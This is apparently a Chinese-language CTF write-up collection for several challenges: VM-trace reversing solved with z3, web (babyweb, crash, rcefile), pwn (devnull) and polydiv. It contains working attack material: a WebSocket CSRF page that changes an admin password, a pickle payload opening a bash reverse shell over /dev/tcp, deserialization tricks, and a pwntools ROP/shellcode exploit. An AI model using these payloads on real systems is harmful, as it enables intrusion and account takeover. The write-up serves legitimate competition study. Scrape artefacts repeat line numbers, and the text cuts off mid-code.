[VAL_B + 0] 0080acc2: VAL_H <- VAL_H + 0 0080acda: 80acd2 <- 0 0080acf2: VAL_I <- 0 0080ad0a: VAL_B <- &VAL_I 0080ad22: 80ad4a <- [VAL_B + 0] 0080ad3a: VAL_I <- VAL_I + 0 0080ad52: 80ad4a <- 0 0080ad6a: VAL_B <- &VAL_G 0080ad82: 80adaa <- [VAL_B + 0] 0080ad9a: VAL_I <- VAL_I + 0 0080adb2: 80adaa <- 0 0080adca: VAL_B <- &VAL_I 0080ade2: 80ae0a <- [VAL_B + 0] 0080adfa: VAL_J <- VAL_H + 0 0080ae12: 80ae0a <- 0 0080ae2a: 804000 <- 0 0080ae42: 80ae2a <- a10080415c253480 0080ae5a: 80ae32 <- c3 0080ae72: VAL_C <- 80ae2a 0080ae8a: TYPE_C <- 1000a0000001a 0080aea2: 80ae2a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x80415c], 0xa1 -------------------- 0080aeba: VAL_B <- a53f62 0080aed2: LEN_B <- 18 0080aeea: 80ae2a <- [VAL_B + 0] 0080af02: VAL_B <- &VAL_J 0080af1a: LEN_B <- 8 0080af32: 80af5a <- [VAL_B + 0] 0080af4a: VAL_E <- VAL_E + 0 0080af62: 80af5a <- 0 0080af7a: VAL_F <- 0 0080af92: VAL_G <- 0 0080afaa: VAL_H <- 0 0080afc2: VAL_I <- 0 0080afda: VAL_J <- 0 0080aff2: VAL_B <- 40405e 0080b00a: VAL_F <- [VAL_B + 0] 0080b022: VAL_B <- 40405f 0080b03a: VAL_G <- [VAL_B + 0] 0080b052: VAL_H <- 0 0080b06a: VAL_B <- &VAL_H 0080b082: 80b0aa <- [VAL_B + 0] 0080b09a: VAL_H <- VAL_H + 0 0080b0b2: 80b0aa <- 0 0080b0ca: VAL_B <- &VAL_F 0080b0e2: 80b10a <- [VAL_B + 0] 0080b0fa: VAL_H <- VAL_H + 0 0080b112: 80b10a <- 0 0080b12a: VAL_I <- 0 0080b142: VAL_B <- &VAL_I 0080b15a: 80b182 <- [VAL_B + 0] 0080b172: VAL_I <- VAL_I + 0 0080b18a: 80b182 <- 0 0080b1a2: VAL_B <- &VAL_G 0080b1ba: 80b1e2 <- [VAL_B + 0] 0080b1d2: VAL_I <- VAL_I + 0 0080b1ea: 80b1e2 <- 0 0080b202: VAL_B <- &VAL_I 0080b21a: 80b242 <- [VAL_B + 0] 0080b232: VAL_J <- VAL_H + 0 0080b24a: 80b242 <- 0 0080b262: 804000 <- 0 0080b27a: 80b262 <- b10080415c253480 0080b292: 80b26a <- c3 0080b2aa: VAL_C <- 80b262 0080b2c2: TYPE_C <- 1000a0000001a 0080b2da: 80b262 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x80415c], 0xb1 -------------------- 0080b2f2: VAL_B <- a53f62 0080b30a: LEN_B <- 18 0080b322: 80b262 <- [VAL_B + 0] 0080b33a: VAL_B <- &VAL_J 0080b352: LEN_B <- 8 0080b36a: 80b392 <- [VAL_B + 0] 0080b382: VAL_E <- VAL_E + 0 0080b39a: 80b392 <- 0 0080b3b2: VAL_F <- 0 0080b3ca: VAL_G <- 0 0080b3e2: VAL_H <- 0 0080b3fa: VAL_I <- 0 0080b412: VAL_J <- 0 0080b42a: VAL_B <- 40405e 0080b442: VAL_F <- [VAL_B + 0] 0080b45a: VAL_B <- 40405f 0080b472: VAL_G <- [VAL_B + 0] 0080b48a: VAL_H <- 0 0080b4a2: VAL_B <- &VAL_H 0080b4ba: 80b4e2 <- [VAL_B + 0] 0080b4d2: VAL_H <- VAL_H + 0 0080b4ea: 80b4e2 <- 0 0080b502: VAL_B <- &VAL_F 0080b51a: 80b542 <- [VAL_B + 0] 0080b532: VAL_H <- VAL_H + 0 0080b54a: 80b542 <- 0 0080b562: VAL_B <- &VAL_H 0080b57a: 80b5a2 <- [VAL_B + 0] 0080b592: VAL_H <- VAL_H + 0 0080b5aa: 80b5a2 <- 0 0080b5c2: VAL_I <- 0 0080b5da: VAL_B <- &VAL_I 0080b5f2: 80b61a <- [VAL_B + 0] 0080b60a: VAL_I <- VAL_I + 0 0080b622: 80b61a <- 0 0080b63a: VAL_B <- &VAL_G 0080b652: 80b67a <- [VAL_B + 0] 0080b66a: VAL_I <- VAL_I + 0 0080b682: 80b67a <- 0 0080b69a: VAL_B <- &VAL_I 0080b6b2: 80b6da <- [VAL_B + 0] 0080b6ca: VAL_J <- VAL_H + 0 0080b6e2: 80b6da <- 0 0080b6fa: 804000 <- 0 0080b712: 80b6fa <- e50080415c253480 0080b72a: 80b702 <- c3 0080b742: VAL_C <- 80b6fa 0080b75a: TYPE_C <- 1000a0000001a 0080b772: 80b6fa <- SHELLCODE -------------------- 0x0: xor byte ptr [0x80415c], 0xe5 -------------------- 0080b78a: VAL_B <- a53f62 0080b7a2: LEN_B <- 18 0080b7ba: 80b6fa <- [VAL_B + 0] 0080b7d2: VAL_B <- &VAL_J 0080b7ea: LEN_B <- 8 0080b802: 80b82a <- [VAL_B + 0] 0080b81a: VAL_E <- VAL_E + 0 0080b832: 80b82a <- 0 0080b84a: VAL_F <- 0 0080b862: VAL_G <- 0 0080b87a: VAL_H <- 0 0080b892: VAL_I <- 0 0080b8aa: VAL_J <- 0 0080b8c2: VAL_B <- &VAL_E 0080b8da: LEN_B <- 1 0080b8f2: 404064 <- [VAL_B + 0] 0080b90a: 804000 <- 0 0080b922: 804000 <- 0 0080b93a: 804000 <- 0 22- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 182
- 183
- 184
- 185
- 186
- 187
- 188
- 189
- 190
- 191
- 192
- 193
- 194
- 195
- 196
- 197
- 198
- 199
- 200
- 201
- 202
- 203
- 204
- 205
- 206
- 207
- 208
- 209
- 210
- 211
- 212
- 213
- 214
- 215
- 216
- 217
- 218
- 219
- 220
- 221
- 222
- 223
- 224
- 225
- 226
- 227
- 228
- 229
- 230
- 231
- 232
- 233
- 234
- 235
- 236
- 237
- 238
- 239
- 240
- 241
- 242
- 243
- 244
- 245
- 246
- 247
- 248
- 249
- 250
- 251
- 252
- 253
- 254
- 255
- 256
- 257
- 258
- 259
- 260
- 261
- 262
- 263
- 264
- 265
- 266
- 267
- 268
- 269
- 270
- 271
- 272
- 273
- 274
- 275
- 276
- 277
- 278
- 279
- 280
- 281
- 282
- 283
- 284
- 285
- 286
- 287
- 288
- 289
- 290
- 291
- 292
- 293
- 294
- 295
- 296
- 297
- 298
- 299
- 300
- 301
- 302
- 303
- 304
- 305
- 306
- 307
- 308
- 309
- 310
- 311
- 312
- 313
- 314
- 315
- 316
- 317
- 318
- 319
- 320
- 321
- 322
- 323
- 324
- 325
- 326
- 327
- 328
- 329
- 330
- 331
- 332
- 333
- 334
- 335
- 336
- 337
- 338
- 339
- 340
- 341
- 342
- 343
- 344
- 345
- 346
- 347
- 348
- 349
- 350
- 351
- 352
- 353
- 354
- 355
- 356
- 357
- 358
- 359
- 360
- 361
- 362
- 363
- 364
- 365
- 366
- 367
- 368
- 369
- 370
- 371
- 372
- 373
- 374
- 375
- 376
- 377
- 378
- 379
- 380
- 381
- 382
- 383
- 384
- 385
- 386
- 387
- 388
- 389
- 390
- 391
- 392
- 393
- 394
- 395
- 396
- 397
- 398
- 399
- 400
- 401
- 402
- 403
- 404
- 405
- 406
- 407
- 408
- 409
- 410
- 411
- 412
- 413
- 414
- 415
- 416
- 417
- 418
- 419
- 420
- 421
- 422
- 423
- 424
- 425
- 426
- 427
- 428
- 429
- 430
- 431
- 432
- 433
- 434
- 435
- 436
- 437
- 438
- 439
- 440
- 441
- 442
- 443
- 444
- 445
- 446
- 447
- 448
- 449
- 450
- 451
- 452
- 453
- 454
- 455
- 456
- 457
- 458
- 459
- 460
- 461
- 462
- 463
- 464
- 465
- 466
- 467
- 468
- 469
- 470
- 471
- 472
- 473
- 474
- 475
- 476
- 477
- 478
- 479
- 480
- 481
- 482
- 483
- 484
- 485
- 486
- 487
- 488
- 489
- 490
- 491
- 492
- 493
- 494
- 495
- 496
- 497
- 498
- 499
- 500
- 501
- 502
- 503
- 504
- 505
- 506
- 507
- 508
- 509
- 510
- 511
- 512
- 513
- 514
- 515
- 516
- 517
- 518
- 519
- 520
- 521
- 522
- 523
- 524
- 525
- 526
- 527
- 528
- 529
- 530
- 531
- 532
- 533
- 534
- 535
- 536
- 537
- 538
- 539
- 540
- 541
- 542
- 543
- 544
- 545
- 546
- 547
- 548
- 549
- 550
- 551
- 552
- 553
- 554
- 555
- 556
- 557
- 558
- 559
- 560
- 561
- 562
- 563
- 564
- 565
- 566
- 567
- 568
- 569
- 570
- 571
- 572
- 573
- 574
- 575
- 576
- 577
- 578
- 579
- 580
- 581
- 582
- 583
- 584
- 585
- 586
- 587
- 588
- 589
- 590
- 591
- 592
- 593
- 594
- 595
- 596
- 597
- 598
- 599
- 600
- 601
- 602
- 603
- 604
- 605
- 606
- 607
- 608
- 609
- 610
- 611
- 612
- 613
- 614
- 615
- 616
- 617
- 618
- 619
- 620
- 621
- 622
- 623
- 624
- 625
- 626
- 627
- 628
- 629
- 630
- 631
- 632
- 633
- 634
- 635
- 636
- 637
- 638
- 639
- 640
- 641
- 642
- 643
- 644
- 645
- 646
- 647
- 648
- 649
- 650
- 651
- 652
- 653
- 654
- 655
- 656
- 657
- 658
- 659
- 660
- 661
- 662
- 663
- 664
- 665
- 666
- 667
- 668
- 669
- 670
- 671
- 672
- 673
- 674
- 675
- 676
- 677
- 678
- 679
- 680
- 681
- 682
- 683
- 684
- 685
- 686
- 687
- 688
- 689
- 690
- 691
- 692
- 693
- 694
- 695
- 696
- 697
- 698
- 699
- 700
- 701
- 702
- 703
- 704
- 705
- 706
- 707
- 708
- 709
- 710
- 711
- 712
- 713
- 714
- 715
- 716
- 717
- 718
- 719
- 720
- 721
- 722
- 723
- 724
- 725
- 726
- 727
- 728
- 729
- 730
- 731
- 732
- 733
- 734
- 735
- 736
- 737
- 738
- 739
- 740
- 741
- 742
- 743
- 744
- 745
- 746
- 747
- 748
- 749
- 750
- 751
- 752
- 753
- 754
- 755
- 756
- 757
- 758
- 759
- 760
- 761
- 762
- 763
- 764
- 765
- 766
- 767
- 768
- 769
- 770
- 771
- 772
- 773
- 774
- 775
- 776
- 777
- 778
- 779
- 780
- 781
- 782
- 783
- 784
- 785
- 786
- 787
- 788
- 789
- 790
- 791
- 792
- 793
- 794
- 795
- 796
- 797
- 798
- 799
- 800
- 801
- 802
- 803
- 804
- 805
- 806
- 807
- 808
- 809
- 810
- 811
- 812
- 813
- 814
- 815
- 816
- 817
- 818
- 819
- 820
- 821
- 822
- 823
- 824
- 825
- 826
- 827
- 828
- 829
- 830
- 831
- 832
- 833
- 834
- 835
- 836
- 837
- 838
- 839
- 840
- 841
- 842
- 843
- 844
- 845
- 846
- 847
- 848
- 849
- 850
- 851
- 852
- 853
- 854
- 855
- 856
- 857
- 858
- 859
- 860
- 861
- 862
- 863
- 864
- 865
- 866
- 867
- 868
- 869
- 870
- 871
- 872
- 873
- 874
- 875
- 876
- 877
- 878
- 879
- 880
- 881
- 882
- 883
- 884
- 885
- 886
- 887
- 888
- 889
- 890
- 891
- 892
- 893
- 894
- 895
- 896
- 897
- 898
- 899
- 900
- 901
- 902
- 903
- 904
- 905
- 906
- 907
- 908
- 909
- 910
- 911
- 912
- 913
- 914
- 915
- 916
- 917
- 918
- 919
- 920
- 921
- 922
- 923
- 924
- 925
- 926
- 927
- 928
- 929
- 930
- 931
- 932
- 933
- 934
- 935
- 936
- 937
- 938
- 939
- 940
- 941
- 942
- 943
- 944
- 945
- 946
- 947
- 948
- 949
- 950
- 951
- 952
- 953
- 954
- 955
- 956
- 957
- 958
- 959
- 960
- 961
- 962
- 963
- 964
- 965
- 966
- 967
- 968
- 969
- 970
- 971
- 972
- 973
- 974
- 975
- 976
- 977
- 978
- 979
- 980
- 981
- 982
- 983
- 984
- 985
- 986
- 987
- 988
- 989
- 990
- 991
- 992
- 993
- 994
- 995
- 996
- 997
- 998
- 999
- 1000
- 1001
- 1002
- 1003
- 1004
- 1005
- 1006
- 1007
- 1008
- 1009
- 1010
- 1011
- 1012
- 1013
- 1014
- 1015
- 1016
- 1017
- 1018
- 1019
- 1020
- 1021
- 1022
- 1023
- 1024
- 1025
- 1026
- 1027
- 1028
- 1029
- 1030
- 1031
- 1032
- 1033
- 1034
- 1035
- 1036
- 1037
- 1038
- 1039
- 1040
- 1041
- 1042
- 1043
- 1044
- 1045
- 1046
- 1047
- 1048
- 1049
- 1050
- 1051
- 1052
- 1053
- 1054
- 1055
- 1056
- 1057
- 1058
- 1059
- 1060
- 1061
- 1062
- 1063
- 1064
- 1065
- 1066
- 1067
- 1068
- 1069
- 1070
- 1071
- 1072
- 1073
- 1074
- 1075
- 1076
- 1077
- 1078
- 1079
- 1080
- 1081
- 1082
- 1083
- 1084
- 1085
- 1086
- 1087
- 1088
- 1089
- 1090
- 1091
- 1092
- 1093
- 1094
- 1095
- 1096
- 1097
- 1098
- 1099
- 1100
- 1101
- 1102
- 1103
- 1104
- 1105
- 1106
- 1107
- 1108
- 1109
- 1110
- 1111
- 1112
- 1113
- 1114
- 1115
- 1116
- 1117
- 1118
- 1119
- 1120
- 1121
- 1122
- 1123
- 1124
- 1125
- 1126
- 1127
- 1128
- 1129
- 1130
- 1131
- 1132
- 1133
- 1134
- 1135
- 1136
- 1137
- 1138
- 1139
- 1140
- 1141
- 1142
- 1143
- 1144
- 1145
- 1146
- 1147
- 1148
- 1149
- 1150
- 1151
- 1152
- 1153
- 1154
- 1155
- 1156
- 1157
- 1158
- 1159
- 1160
- 1161
- 1162
- 1163
- 1164
- 1165
- 1166
- 1167
- 1168
- 1169
- 1170
- 1171
- 1172
- 1173
- 1174
- 1175
- 1176
- 1177
- 1178
- 1179
- 1180
- 1181
- 1182
- 1183
- 1184
- 1185
- 1186
- 1187
- 1188
- 1189
- 1190
- 1191
- 1192
- 1193
- 1194
- 1195
- 1196
- 1197
- 1198
- 1199
- 1200
- 1201
- 1202
- 1203
- 1204
- 1205
- 1206
- 1207
- 1208
- 1209
- 1210
- 1211
- 1212
- 1213
- 1214
- 1215
- 1216
- 1217
- 1218
- 1219
- 1220
- 1221
- 1222
- 1223
- 1224
- 1225
- 1226
- 1227
- 1228
- 1229
- 1230
- 1231
- 1232
- 1233
- 1234
- 1235
- 1236
- 1237
- 1238
- 1239
- 1240
- 1241
- 1242
- 1243
- 1244
- 1245
- 1246
- 1247
- 1248
- 1249
- 1250
- 1251
- 1252
- 1253
- 1254
- 1255
- 1256
- 1257
- 1258
- 1259
- 1260
- 1261
- 1262
- 1263
- 1264
- 1265
- 1266
- 1267
- 1268
- 1269
- 1270
- 1271
- 1272
- 1273
- 1274
- 1275
- 1276
- 1277
- 1278
- 1279
- 1280
- 1281
- 1282
- 1283
- 1284
- 1285
- 1286
- 1287
- 1288
- 1289
- 1290
- 1291
- 1292
- 1293
- 1294
- 1295
- 1296
- 1297
- 1298
- 1299
- 1300
- 1301
- 1302
- 1303
- 1304
- 1305
- 1306
- 1307
- 1308
- 1309
- 1310
- 1311
- 1312
- 1313
- 1314
- 1315
- 1316
- 1317
- 1318
- 1319
- 1320
- 1321
- 1322
- 1323
- 1324
- 1325
- 1326
- 1327
- 1328
- 1329
- 1330
- 1331
- 1332
- 1333
- 1334
- 1335
- 1336
- 1337
- 1338
- 1339
- 1340
- 1341
- 1342
- 1343
- 1344
- 1345
- 1346
- 1347
- 1348
- 1349
- 1350
- 1351
- 1352
- 1353
- 1354
- 1355
- 1356
- 1357
- 1358
- 1359
- 1360
- 1361
- 1362
- 1363
- 1364
- 1365
- 1366
- 1367
- 1368
- 1369
- 1370
- 1371
- 1372
- 1373
- 1374
- 1375
- 1376
- 1377
- 1378
- 1379
- 1380
- 1381
- 1382
- 1383
- 1384
- 1385
- 1386
- 1387
- 1388
- 1389
- 1390
- 1391
- 1392
- 1393
- 1394
- 1395
- 1396
- 1397
- 1398
- 1399
- 1400
- 1401
- 1402
- 1403
- 1404
- 1405
- 1406
- 1407
- 1408
- 1409
- 1410
- 1411
- 1412
- 1413
- 1414
- 1415
- 1416
- 1417
- 1418
- 1419
- 1420
- 1421
- 1422
- 1423
- 1424
- 1425
- 1426
- 1427
- 1428
- 1429
- 1430
- 1431
- 1432
- 1433
- 1434
- 1435
- 1436
- 1437
- 1438
- 1439
- 1440
- 1441
- 1442
- 1443
- 1444
- 1445
- 1446
- 1447
- 1448
- 1449
- 1450
- 1451
- 1452
- 1453
- 1454
- 1455
- 1456
- 1457
- 1458
- 1459
- 1460
- 1461
- 1462
- 1463
- 1464
- 1465
- 1466
- 1467
- 1468
- 1469
- 1470
- 1471
- 1472
- 1473
- 1474
- 1475
- 1476
- 1477
- 1478
- 1479
- 1480
- 1481
- 1482
- 1483
- 1484
- 1485
- 1486
- 1487
- 1488
- 1489
- 1490
- 1491
- 1492
- 1493
- 1494
- 1495
- 1496
- 1497
- 1498
- 1499
- 1500
- 1501
- 1502
- 1503
- 1504
- 1505
- 1506
- 1507
- 1508
- 1509
- 1510
- 1511
- 1512
- 1513
- 1514
- 1515
- 1516
- 1517
- 1518
- 1519
- 1520
- 1521
- 1522
- 1523
- 1524
- 1525
- 1526
- 1527
- 1528
- 1529
- 1530
- 1531
6、提取关键内容
008042ba: 804000 <- 0 008042d2: 804000 <- 0 008042ea: VAL_B <- 404040 00804302: LEN_B <- 1 0080431a: VAL_D <- [VAL_B + 0] 00804332: 804000 <- 0 0080434a: 804332 <- 16008040cc253480 00804362: 80433a <- c3 0080437a: VAL_C <- 804332 00804392: TYPE_C <- 1000a0000001a 008043aa: 804332 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x16 -------------------- 008043c2: VAL_B <- a53f62 008043da: LEN_B <- 18 008043f2: 804332 <- [VAL_B + 0] 0080440a: 804000 <- 0 00804422: 80440a <- 8040cc250480 0080443a: 804412 <- c3 00804452: VAL_C <- 80440a 0080446a: TYPE_C <- 1000a0000001a 00804482: 80440a <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0 --------------------- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
7、分析可得算法:(((xorkey[i]) ^ flag[i]) + i) ^ fake[i] == 0
from z3 import * xorkey = [ 0x16, 0x17, 0x10, 0x12, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x24, 0x2c, 0x26, 0x1e, 0x1f, 0x20, 0x20, 0x21, 0x23, 0x27, 0x24, 0x25, 0x26, 0x27, ] fake = [ 0x70, 0x7c, 0x73, 0x78, 0x6f, 0x27, 0x2a, 0x2c, 0x7f, 0x35, 0x2d, 0x32, 0x37, 0x3b, 0x22, 0x59, 0x53, 0x8e, 0x3d, 0x2a, 0x59, 0x27, 0x2d, 0x29, 0x34, 0x2d, 0x61, 0x32 ] sol = Solver() flag = [BitVec(f'flag[{i}]', 8) for i in range(32)] for i in range(0, 28): s2 = (((xorkey[i]) ^ flag[i]) + i) ^ fake[i] print(hex((xorkey[i] + i)), i) sol.add(s2 == 0) s2 = (flag[28] + flag[29]) ^ 0x6c sol.add(s2 == 0) s2 = (flag[28] + flag[28] + flag[29]) ^ 0xa1 sol.add(s2 == 0) s2 = (flag[30] + flag[31]) ^ 0xb1 sol.add(s2 == 0) s2 = (flag[30] + flag[30] + flag[31]) ^ 0xe5 sol.add(s2 == 0) assert sol.check() == sat mol = sol.model() f = bytearray([mol.eval(flag[i]).as_long() for i in range(len(flag))]) print(f)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
flag{366c950370fec47e34581a0574}【Web】babyweb
1、有注册页面先注册一个账号
2、进去以后发现有提示,help一下看看
3、代码保存为bott.html放入服务器中
<meta charset="utf-8"> <script> function ws_attack() { var ws = new WebSocket("ws://127.0.0.1:8888/bot"); ws.onopen = function(evt) { ws.send("changepw 123456"); }; } ws_attack(); script>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
4、让bot访问bugreport http://xxx.xxx.xxx.xxx/bott.html
5、此时admin密码改为了123456,从登录界面直接登录进去
6、登录进来以后有个买东西的界面,我们尝试通过抓包进行修改价格以拿到flag
7、成功会显示“success”并给出flag
flag{113644b4-bc6e-4715-b76a-9c7ee58a57ef}【Web】crash
1、进去访问以后看到
2、根据1中的提示先访问login
3、写一个反弹shell用base64封装
import base64 print(base64.b64encode(b'(cos\nsystem\nX\x36\x00\x00\x00bash -c "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1234 0>&1"o.'))- 1
- 2
4、开启监听
5、在cookie中的userdata替换经过base64输出的值,然后访问/balancer后获取到shell
6、但是Nginx还存在,所以写一个flask让它超时
from flask import Flask import random import time app = Flask(__name__, static_url_path='') app.secret_key=random.randbytes(12) @app.route('/', methods=['GET', 'POST']) def index(): time.sleep(3000) return "" if __name__ == '__main__': app.run(host='0.0.0.0', port=5000)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
7、由于环境中没有vim,将以上代码经过base64后通过以下方法写入
echo ZnJvbSBmbGFzayBpbXBvcnQgRmxhc2sKaW1wb3J0IHJhbmRvbQppbXBvcnQgdGltZQoKYXBwID0gRmxhc2soX19uYW1lX18sIHN0YXRpY191cmxfcGF0aD0nJykKYXBwLnNlY3JldF9rZXk9cmFuZG9tLnJhbmRieXRlcygxMikKCkBhcHAucm91dGUoJy8nLCBtZXRob2RzPVsnR0VUJywgJ1BPU1QnXSkKZGVmIGluZGV4KCk6CiAgICB0aW1lLnNsZWVwKDMwMDApCiAgICByZXR1cm4gIiIKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIGFwcC5ydW4oaG9zdD0nMC4wLjAuMCcsIHBvcnQ9NTAwMCk= | base64 -d > app.py- 1
8、ls确定有app.py后就可以flask run了
9、最后在本机上curl题目链接就出flag了
flag{8aa95268-7749-4910-a1a3-d8258625b9b2}【强网先锋】rcefile
1、文件上传默认试试一句话
2、发现不能执行,用dirsearch扫描目录看看有没有别的
3、用dirsearch扫描发现网站源码
4、下载并查看源码
5、重新进行文件上传
6、抓包后问价后缀改成inc
7、得到文件名进行反序列化
class Z60ca942030d3667beb7ea8a31cc5ca0c{ function __construct() { } } $z=new Z60ca942030d3667beb7ea8a31cc5ca0c(); echo serialize($z); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
运行结果为:O:33:"Z60ca942030d3667beb7ea8a31cc5ca0c":0:{}- 1
8、访问showfile.php,更改cookie值为O:32:“60ca942030d3667beb7ea8a31cc5ca0c”:0:{}。最后得到flag
flag{3529c27-ca68-4cf1-b141-9e0ac878804e}【强网先锋】devnull
from http.client import RemoteDisconnected from pwn import * p=remote('123.56.45.155',35285) elf=ELF('/root/桌面/devnull') context(arch='amd64', os='linux') p.recvuntil('filename') payload=36*b'a'+p64(0x3fe000)*4+p32(0x0000000000401354) p.send(payload) sleep(0.1) p.send(p64(0x3fe000+0x28)+p64(0x401350)+p64(0x3fe000)+b'/bin/sh\x00'*2+p64(0xdeadbeef)+p64(0x4012d0)+p64(0)+p64(0x3fe000+0x48)+asm(shellcraft.execve(0x3fe000+0x18,0,0))) sleep(1) p.sendline('exec 1>&2') p.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
flag{2181947d-377c-445c-bcab-579e70ba3911}【强网先锋】polydiv
1、题目描述了一个Polynomial模二多项式环的实现,具体是根据给出的r、a、c多项式求解满足条件的b多项式
举例:
r(x) = x^14 + x^12 + x^7 + x^6 + x^5 + 1
a(x) = x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x
c(x) = x^6 + 1
Please give me the b(x) which satisfy a(x)*b(x)+c(x)=r(x)2、可以看到nc远程服务器上的x位数不超过16位,其中r小于16位,a、c分别小于8位,那么根据a(x)*b(x)+c(x)=r(x),b也小于8位,b就共有2^8种可能,可以尝试利用题目给的条件爆破。
3、首先是用proof爆破sha256前四位其次class Polynomial2()和def Poly(*args)是题目给的附件,de_lax函数为将LaTeX表达式转化为题目描述的形式类似于将 r(x) = x^4 + x^3 + x转化为Poly([3,1,4])方便计算
4、cal_b函数即利用class Polynomial2()求解满足a(x)*b(x)+c(x)=r(x)的b
from pwn import * from hashlib import sha256 import string from tqdm import tqdm dic = string.ascii_letters + string.digits #context(os='linux', arch='i386', log_level='debug') class Polynomial2(): ''' 模二多项式环,定义方式有三种 一是从高到低给出每一项的系数 >>> Polynomial2([1,1,0,1]) x^3 + x^2 + 1 二是写成01字符串形式 >>> Polynomial2('1101') x^3 + x^2 + 1 三是直接给出系数为1的项的阶 >>> Poly([3,1,4]) x^4 + x^3 + x >>> Poly([]) # 加法元 0 >>> Poly(0) # 乘法元 1 >>> Poly(1,2) * Poly(2,3) x^5 + x^3 ''' def __init__(self,ll): if type(ll) == str: ll = list(map(int,ll)) self.param = ll[::-1] self.ones = [i for i in range(len(self.param)) if self.param[i] == 1] # 系数为1的项的阶数列表 self.Latex = self.latex() self.b = ''.join([str(i) for i in ll]) # 01串形式打印系数 self.order = 0 # 最高阶 try:self.order = max(self.ones) except:pass def format(self,reverse = True): ''' 格式化打印字符串 默认高位在左 reverse = False时,低位在左 但是注意定义多项式时只能高位在右 ''' r = '' if len(self.ones) == 0: return '0' if reverse: return ((' + '.join(f'x^{i}' for i in self.ones[::-1])+' ').replace('x^0','1').replace('x^1 ','x ')).strip() return ((' + '.join(f'x^{i}' for i in self.ones)+' ').replace('x^0','1').replace('x^1 ','x ')).strip() def __call__(self,x): ''' 懒得写了,用不到 ''' print(f'call({x})') def __add__(self,other): ''' 多项式加法 ''' a,b = self.param[::-1],other.param[::-1] if len(a) < len(b):a,b = b,a for i in range(len(a)): try:a[-1-i] = (b[-1-i] + a[-1-i]) % 2 except:break return Polynomial2(a) def __mul__(self,other): ''' 多项式乘法 ''' a,b = self.param[::-1],other.param[::-1] r = [0 for i in range(len(a) + len(b) - 1)] for i in range(len(b)): if b[-i-1] == 1: if i != 0:sa = a+[0]*i else:sa = a sa = [0] * (len(r)-len(sa)) + sa #r += np.array(sa) #r %= 2 r = [(r[t] + sa[t])%2 for t in range(len(r))] return Polynomial2(r) def __sub__(self,oo): # 模二多项式环,加减相同 return self + oo def __repr__(self) -> str: return self.format() def __str__(self) -> str: return self.format() def __pow__(self,a): # 没有大数阶乘的需求,就没写快速幂 t = Polynomial2([1]) for i in range(a): t *= self return t def latex(self,reverse=True): ''' Latex格式打印...其实就是给两位及以上的数字加个括号{} ''' def latex_pow(x): if len(str(x)) <= 1: return str(x) return '{'+str(x)+'}' r = '' if len(self.ones) == 0: return '0' if reverse: return (' + '.join(f'x^{latex_pow(i)}' for i in self.ones[::-1])+' ').replace('x^0','1').replace(' x^1 ',' x ').strip() return (' + '.join(f'x^{latex_pow(i)}' for i in self.ones)+' ').replace('x^0','1').replace(' x^1 ',' x ').strip() def __eq__(self,other): return self.ones == other.ones def __lt__(self,other): return max(self.ones) < max(other.ones) def __le__(self,other): return max(self.ones) <= max(other.ones) def Poly(*args): ''' 另一种定义方式 Poly([3,1,4]) 或 Poly(3,1,4) ''' if len(args) == 1 and type(args[0]) in [list,tuple]: args = args[0] if len(args) == 0: return Polynomial2('0') ll = [0 for i in range(max(args)+1)] for i in args: ll[i] = 1 return Polynomial2(ll[::-1]) PP = Polynomial2 P = Poly def de_lax(s): re = [] t = s.replace(' ', '').split('+') for i in range(len(t)): if 'x^' in t[i]: re.append(int(t[i].replace('x^', ''))) elif 'x' in t[i]: re.append(1) else: re.append(0) return re def cal_b(m): r, a, c = Poly(de_lax(m[0])), Poly(de_lax(m[1])), Poly(de_lax(m[2])) for i in range(0, 0b111111111): b = PP(bin(i)[2:]) if a * b + c == r: return b def proof(): for a in tqdm(dic): for b in dic: for c in dic: for d in dic: head = a + b + c + d h = sha256((head + tail).encode()).hexdigest() if h == HASH: 